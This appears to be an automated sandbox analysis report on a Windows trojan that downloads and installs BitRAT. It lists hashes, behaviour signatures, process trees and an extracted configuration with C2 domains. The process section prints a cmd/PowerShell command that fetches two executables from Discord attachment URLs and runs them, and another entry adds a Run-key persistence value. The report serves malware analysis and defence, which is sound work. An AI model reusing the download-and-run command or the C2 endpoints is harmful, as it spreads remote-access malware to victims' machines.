Analysis
- max time kernel: 151s
- max time network: 154s
- platform: windows7_x64
- resource: win7-en-20211208
- submitted: 29-01-2022 15:49
Static task: static1
Behavioral task: behavioral1
- Sample: SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe
- Resource: win7-en-20211208
Behavioral task: behavioral2
- Sample: SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe
- Resource: win10-en-20211208
General
- Target: SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe
- Size: 46KB
- MD5: 0c3281387e69e28ac3865135420ec039
- SHA1: 068bd09ad5f8dae225da6b53754823ed6f194973
- SHA256: 2d3c256a17925e5102852d2a9ecd212d9118ae9003b9c6cc064a598ef95e4891
- SHA512: d8d7a8b678b37b91206db130cbefd522a8b6d3e1617acb981a1ae4367dc48c311ac64b9e973b14bdb0ff9cc6b62481f55b541791244b664907c95a29d9f9ceb0
Malware Config
- Extracted: https://cdn.discordapp.com/attachments/935052169835593748/936025628916973638/hissbitrat.exe
- Extracted: https://cdn.discordapp.com/attachments/935052169835593748/936025629655175188/mybitrat.exe
- Extracted: bitrat 1.38
  - linksphere.duckdns.org:1440
  - anubisgod.duckdns.org:1442
  - communication_password: 81dc9bdb52d04dc20036dbd8313ed055
  - install_dir: Queeno
  - install_file: Queenol.exe
  - tor_process: tor
Signatures
- Blocklisted process makes network request (2 IoCs)
  Processes: powershell.exe, powershell.exe
    flow 5 | pid 1372 | powershell.exe
    flow 7 | pid 1788 | powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (2 IoCs)
  Processes: hissbitrat.exe, mybitrat.exe
    pid 1196 | hissbitrat.exe
    pid 1232 | mybitrat.exe
- Loads dropped DLL (4 IoCs)
  Processes: powershell.exe, powershell.exe
    pid 1052 | powershell.exe (2 entries)
    pid 992 | powershell.exe (2 entries)
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes: hissbitrat.exe, mybitrat.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Queenol = "C:\\Users\\Admin\\AppData\\Local\\Queeno\\Queenol.exe" | hissbitrat.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\Queenol = "C:\\Users\\Admin\\AppData\\Local\\Queeno\\Queenol.exe" | mybitrat.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (8 IoCs)
  Processes: hissbitrat.exe, mybitrat.exe
    pid 1196 | hissbitrat.exe (4 entries)
    pid 1232 | mybitrat.exe (4 entries)
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes: powershell.exe, powershell.exe, powershell.exe, powershell.exe
    pid 1372 | powershell.exe
    pid 1788 | powershell.exe
    pid 1052 | powershell.exe (3 entries)
    pid 992 | powershell.exe (3 entries)
- Suspicious use of AdjustPrivilegeToken (8 IoCs)
  Processes: powershell.exe, powershell.exe, powershell.exe, powershell.exe, hissbitrat.exe, mybitrat.exe
    Token: SeDebugPrivilege | pid 1372 | powershell.exe
    Token: SeDebugPrivilege | pid 1788 | powershell.exe
    Token: SeDebugPrivilege | pid 1052 | powershell.exe
    Token: SeDebugPrivilege | pid 992 | powershell.exe
    Token: SeDebugPrivilege | pid 1196 | hissbitrat.exe
    Token: SeShutdownPrivilege | pid 1196 | hissbitrat.exe
    Token: SeDebugPrivilege | pid 1232 | mybitrat.exe
    Token: SeShutdownPrivilege | pid 1232 | mybitrat.exe
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes: hissbitrat.exe, mybitrat.exe
    pid 1196 | hissbitrat.exe (2 entries)
    pid 1232 | mybitrat.exe (2 entries)
- Suspicious use of WriteProcessMemory (28 IoCs)
  Processes: SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe, cmd.exe, powershell.exe, powershell.exe
    PID 1552 wrote to memory of 1528 | SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe -> cmd.exe (4 entries)
    PID 1528 wrote to memory of 1372 | cmd.exe -> powershell.exe (4 entries)
    PID 1528 wrote to memory of 1788 | cmd.exe -> powershell.exe (4 entries)
    PID 1528 wrote to memory of 1052 | cmd.exe -> powershell.exe (4 entries)
    PID 1052 wrote to memory of 1196 | powershell.exe -> hissbitrat.exe (4 entries)
    PID 1528 wrote to memory of 992 | cmd.exe -> powershell.exe (4 entries)
    PID 992 wrote to memory of 1232 | powershell.exe -> mybitrat.exe (4 entries)
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.GenericKD.48131406.23753.exe"
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SysWOW64\cmd.exe
    Command line: cmd /c powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025628916973638/hissbitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025629655175188/mybitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe')" & exit
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025628916973638/hissbitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe'))"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/935052169835593748/936025629655175188/mybitrat.exe', (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe'))"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'hissbitrat.exe')"
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - [4] C:\Users\Admin\AppData\Roaming\hissbitrat.exe
        Command line: "C:\Users\Admin\AppData\Roaming\hissbitrat.exe"
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell "Start-Process -FilePath (Join-Path -Path $env:AppData -ChildPath 'mybitrat.exe')"
      - Loads dropped DLL
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - [4] C:\Users\Admin\AppData\Roaming\mybitrat.exe
        Command line: "C:\Users\Admin\AppData\Roaming\mybitrat.exe"
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  MD5: 76eef2d78f82e0490da18f9a464f0f7c
  SHA1: cd5639659eeeab962ede47c56baec3c9fcda3997
  SHA256: 9a2e42224c333125f4f216607ec1518dce1122416fcae2472d110972f3405be0
  SHA512: 442d548eb4d65f26b60c9bfadd67a05ab79fc7003a7bcfc90bab71467bc136434dc31f0cad8745a7c1c3dba07eac84c5aa111fc462605b60ec991fb73ea829f9
- C:\Users\Admin\AppData\Roaming\hissbitrat.exe
  MD5: 09931bfc16fb78b4b9952931b70146a8
  SHA1: 4f2bc81788297b42d31d4468293cd5ae550df606
  SHA256: 3fb7cf15e0dedf52f522b021a21ba82f30c544bc8ee20adf3695e8d0f9f8550d
  SHA512: b1f2b67c8ce78d129a97abc7e1d17efa07837460d3bee3ad8a108bedaac82c8206bc3485ff30822ef9b9356ca95073c0f3a57f1ee08bf9ba5f387b192ebb7158
- C:\Users\Admin\AppData\Roaming\mybitrat.exe
  MD5: fa6bfb0013165303096d3eb53ca7ed7a
  SHA1: 6b8caf8c8a673fd15bb4146cfe0ab89cb3e1a53d
  SHA256: 445fe1640edcbcd3c21ea1ee3e839f87fbf2970d7f9e6b027287f85bb536a0d7
  SHA512: 2cbf81409db2dd73772b02abc06e04b44ebf62aae164459bec2470f9b36827e1fed193ea438ef4b98575b592d729097ceb09abb88c5e4e3d52ef75078e479f1a
- \Users\Admin\AppData\Roaming\hissbitrat.exe
  MD5: 09931bfc16fb78b4b9952931b70146a8
  SHA1: 4f2bc81788297b42d31d4468293cd5ae550df606
  SHA256: 3fb7cf15e0dedf52f522b021a21ba82f30c544bc8ee20adf3695e8d0f9f8550d
  SHA512: b1f2b67c8ce78d129a97abc7e1d17efa07837460d3bee3ad8a108bedaac82c8206bc3485ff30822ef9b9356ca95073c0f3a57f1ee08bf9ba5f387b192ebb7158
- \Users\Admin\AppData\Roaming\mybitrat.exe
  MD5: fa6bfb0013165303096d3eb53ca7ed7a
  SHA1: 6b8caf8c8a673fd15bb4146cfe0ab89cb3e1a53d
  SHA256: 445fe1640edcbcd3c21ea1ee3e839f87fbf2970d7f9e6b027287f85bb536a0d7
  SHA512: 2cbf81409db2dd73772b02abc06e04b44ebf62aae164459bec2470f9b36827e1fed193ea438ef4b98575b592d729097ceb09abb88c5e4e3d52ef75078e479f1a
- memory/992-74-0x0000000002440000-0x000000000308A000-memory.dmp (Filesize: 12.3MB)
- memory/1052-68-0x0000000002410000-0x000000000305A000-memory.dmp (Filesize: 12.3MB)
- memory/1372-55-0x0000000075B11000-0x0000000075B13000-memory.dmp (Filesize: 8KB)
- memory/1372-56-0x00000000023A0000-0x0000000002FEA000-memory.dmp (Filesize: 12.3MB)
- memory/1788-61-0x00000000023F0000-0x000000000303A000-memory.dmp (Filesize: 12.3MB)